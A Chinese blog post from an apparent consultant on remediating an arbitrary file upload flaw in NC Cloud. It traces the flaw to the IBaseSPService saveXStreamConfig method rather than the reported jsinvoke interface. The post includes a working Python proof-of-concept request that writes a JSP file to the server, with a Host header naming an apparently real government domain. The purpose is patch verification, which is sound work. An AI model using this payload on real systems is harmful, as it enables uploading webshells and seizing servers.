【案例48】接口信息“错误”导致安全漏洞修复未成功

问题现象

客户反馈,公安局大数据中心通报,他们的系统有 NC Cloud jsinvoke 接⼝存在任意⽂件上传漏洞,攻击者通过漏洞可以上传任意⽂件⾄服务器中,获取系统权限。需要限时修复。顾问按照修复方案打上了安全补丁后,公安局复测后发现问题依旧。

问题分析 

1、首先怀疑是安全补丁没有打上导致的。查看相关安全补丁是修改xxx\web.xml文件,无类文件之间的改动。

2、检查相关web.xml发现已经修改。证明安全补丁已经打上。

3、直接浏览器访问接口地址发现,系统报500错误。

后续与公安局技术人员沟通,要到了他们发送的post请求么,并且要到了相关的漏扫报告。

根据提供的json串,编写个python脚本向服务器发起攻击,向服务器的xxx/路径下传送个文件名为444122.jsp,内容为1234的文件。 url和路径等信息都已经隐藏,下方代码为例子,仅供参考。

import requests
import json

### url地址为自己接口地址。
url = "https://IP:Port/uapjs/jsinvoke/?action=invoke" 

payload = json.dumps({
   "serviceName": "xx.xxx.xxx.IBaseSPService",
   "methodName": "saveXStreamConfig",
   "parameterTypes": [
      "java.lang.Object",
      "java.lang.String"
   ],
   "parameters": [
      "1234",
      "xxx/444122.jsp"
   ]
})
headers = {
   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/92.0.4515.159 Safari/537.36',
   'Content-Type': 'application/json',
   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
   'Host': 'ctnc.sc.yichang.gov.cn',
   'Connection': 'close'
}
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)

发现在相关路径下有确实有文件上传。 

通过浏览器直接访问。能看到具体内容为1234。

仔细的查看了提供的接口,发现IBaseSPService方法可疑与jsinvoke 漏洞并不一致。

{
    "serviceName": "xx.xxx.xxxx.IBaseSPService",
    "methodName": "saveXStreamConfig",
    "parameterTypes": [
        "java.lang.Object",
        "java.lang.String"
    ],
    "parameters": [
        "1234",
        "xxx/444122.jsp"
    ]
}

 查找补丁库发现有IBaseSPService相关安全补丁。

打上补丁,重启后,使用Apifox发起攻击,发现并没有攻击上去。

经过复测发现问题已经修复。 

解决方案

确认真实接口,打上相关安全补丁。其实此问题就是标题和内容没有对上导致的。顾问只是按照漏洞名字进行的处理工作,但非真实漏洞,故造成了风险。

  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值